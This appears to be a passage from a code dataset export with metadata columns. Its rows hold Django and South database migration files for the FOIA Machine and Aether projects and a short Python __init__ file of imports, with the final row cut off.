hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
156c3130c467226746745088ce065327bb3c73d9
| 22,800
|
py
|
Python
|
foiamachine/apps/agency/migrations/0001_initial.py
|
dwillis/foiamachine
|
26d3b02870227696cdaab639c39d47b2a7a42ae5
|
[
"Unlicense",
"MIT"
] | 9
|
2017-08-02T16:28:10.000Z
|
2021-07-19T09:51:46.000Z
|
foiamachine/apps/agency/migrations/0001_initial.py
|
dwillis/foiamachine
|
26d3b02870227696cdaab639c39d47b2a7a42ae5
|
[
"Unlicense",
"MIT"
] | null | null | null |
foiamachine/apps/agency/migrations/0001_initial.py
|
dwillis/foiamachine
|
26d3b02870227696cdaab639c39d47b2a7a42ae5
|
[
"Unlicense",
"MIT"
] | 5
|
2017-10-10T23:15:02.000Z
|
2021-07-19T09:51:48.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Agency'
db.create_table('agency_agency', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('deprecated', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('yay_votes', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('nay_votes', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=0)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django_extensions.db.fields.AutoSlugField')(allow_duplicates=False, max_length=50, separator=u'-', blank=True, populate_from=('name',), overwrite=False)),
('government', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['government.Government'])),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('hidden', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('agency', ['Agency'])
# Adding M2M table for field contacts on 'Agency'
db.create_table('agency_agency_contacts', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('agency', models.ForeignKey(orm['agency.agency'], null=False)),
('contact', models.ForeignKey(orm['contacts.contact'], null=False))
))
db.create_unique('agency_agency_contacts', ['agency_id', 'contact_id'])
def backwards(self, orm):
# Deleting model 'Agency'
db.delete_table('agency_agency')
# Removing M2M table for field contacts on 'Agency'
db.delete_table('agency_agency_contacts')
models = {
'agency.agency': {
'Meta': {'object_name': 'Agency'},
'contacts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'agency_related_contacts'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts.Contact']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'government': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['government.Government']"}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contacts.address': {
'Meta': {'object_name': 'Address'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.contact': {
'Meta': {'object_name': 'Contact'},
'addresses': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Address']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'dob': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'emails': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.EmailAddress']", 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'notes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Note']", 'null': 'True', 'blank': 'True'}),
'phone_numbers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Phone']", 'null': 'True', 'blank': 'True'}),
'titles': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contacts.Title']", 'null': 'True', 'blank': 'True'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.note': {
'Meta': {'object_name': 'Note'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.phone': {
'Meta': {'object_name': 'Phone'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contacts.title': {
'Meta': {'object_name': 'Title'},
'content': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.emailaddress': {
'Meta': {'object_name': 'EmailAddress'},
'content': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.adminname': {
'Meta': {'object_name': 'AdminName'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.feeexemptionother': {
'Meta': {'object_name': 'FeeExemptionOther'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'source': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'typee': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.government': {
'Meta': {'object_name': 'Government'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'holidays': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.Holiday']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['government.Nation']", 'null': 'True', 'blank': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'statutes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_statutes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['government.Statute']"}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.holiday': {
'Meta': {'object_name': 'Holiday'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.language': {
'Meta': {'object_name': 'Language'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.nation': {
'Meta': {'object_name': 'Nation'},
'admin_0_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_0_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'admin_1_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_1_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'admin_2_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_2_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'admin_3_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'admin_3_nations'", 'null': 'True', 'to': "orm['government.AdminName']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'foi_languages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.Language']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'primary_language': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_language_nations'", 'null': 'True', 'to': "orm['government.Language']"}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('name',)", 'overwrite': 'False'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.statute': {
'Meta': {'object_name': 'Statute'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'days_till_due': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'designator': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fees_exemptions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.FeeExemptionOther']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "('short_title',)", 'overwrite': 'False'}),
'text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updates': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['government.Update']", 'null': 'True', 'blank': 'True'}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'government.update': {
'Meta': {'object_name': 'Update'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deprecated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'headline': ('django.db.models.fields.CharField', [], {'default': "'The latest'", 'max_length': '1024'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'pubbed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'text': ('django.db.models.fields.TextField', [], {}),
'yay_votes': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['agency']
| 83.211679
| 218
| 0.572895
| 2,255
| 22,800
| 5.675388
| 0.08071
| 0.105642
| 0.183779
| 0.262541
| 0.829583
| 0.810986
| 0.788248
| 0.765276
| 0.717456
| 0.666198
| 0
| 0.008109
| 0.183289
| 22,800
| 274
| 219
| 83.211679
| 0.679179
| 0.007237
| 0
| 0.3861
| 0
| 0
| 0.588467
| 0.343217
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007722
| false
| 0.003861
| 0.015444
| 0
| 0.034749
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
15700d909b888b4e41e74d11021240eaf7370c47
| 3,127
|
py
|
Python
|
aether-kernel/aether/kernel/api/migrations/0006_auto_20180122_1346.py
|
lordmallam/aether
|
7ceb71d2ef8b09d704d94dfcb243dbbdf8356135
|
[
"Apache-2.0"
] | 14
|
2018-08-09T20:57:16.000Z
|
2020-10-11T12:22:18.000Z
|
aether-kernel/aether/kernel/api/migrations/0006_auto_20180122_1346.py
|
lordmallam/aether
|
7ceb71d2ef8b09d704d94dfcb243dbbdf8356135
|
[
"Apache-2.0"
] | 148
|
2018-07-24T10:52:29.000Z
|
2022-02-10T09:06:44.000Z
|
aether-kernel/aether/kernel/api/migrations/0006_auto_20180122_1346.py
|
lordmallam/aether
|
7ceb71d2ef8b09d704d94dfcb243dbbdf8356135
|
[
"Apache-2.0"
] | 6
|
2018-07-25T13:33:10.000Z
|
2019-09-23T03:02:09.000Z
|
# Generated by Django 2.0.1 on 2018-01-22 13:46
from django.db import migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('kernel', '0005_auto_20180116_1246'),
]
operations = [
migrations.AddField(
model_name='attachment',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='attachment',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='mapping',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='mapping',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='project',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='project',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='projectschema',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='projectschema',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='schema',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='schema',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
migrations.AddField(
model_name='submission',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created'),
),
migrations.AddField(
model_name='submission',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified'),
),
]
| 41.144737
| 135
| 0.638951
| 300
| 3,127
| 6.526667
| 0.156667
| 0.073034
| 0.126149
| 0.165475
| 0.902962
| 0.902962
| 0.835036
| 0.835036
| 0.835036
| 0.835036
| 0
| 0.013124
| 0.244643
| 3,127
| 75
| 136
| 41.693333
| 0.815834
| 0.014391
| 0
| 0.869565
| 1
| 0
| 0.102273
| 0.007468
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
17331da500b5f038e5a5c373a6d80c1188740383
| 72
|
py
|
Python
|
thundra/plugins/invocation/__init__.py
|
sturmianseq/thundra-agent-python
|
4cee02d790eb7b8e4dea4e2e9dcd1f67533b1c56
|
[
"Apache-2.0"
] | 22
|
2018-03-05T20:02:46.000Z
|
2021-04-09T12:00:18.000Z
|
thundra/plugins/invocation/__init__.py
|
sturmianseq/thundra-agent-python
|
4cee02d790eb7b8e4dea4e2e9dcd1f67533b1c56
|
[
"Apache-2.0"
] | 13
|
2018-03-26T07:57:57.000Z
|
2021-06-29T14:22:52.000Z
|
thundra/plugins/invocation/__init__.py
|
sturmianseq/thundra-agent-python
|
4cee02d790eb7b8e4dea4e2e9dcd1f67533b1c56
|
[
"Apache-2.0"
] | 3
|
2018-07-04T19:00:25.000Z
|
2020-12-01T11:57:29.000Z
|
from . import invocation_support
from . import invocation_trace_support
| 24
| 38
| 0.861111
| 9
| 72
| 6.555556
| 0.555556
| 0.338983
| 0.677966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 72
| 2
| 39
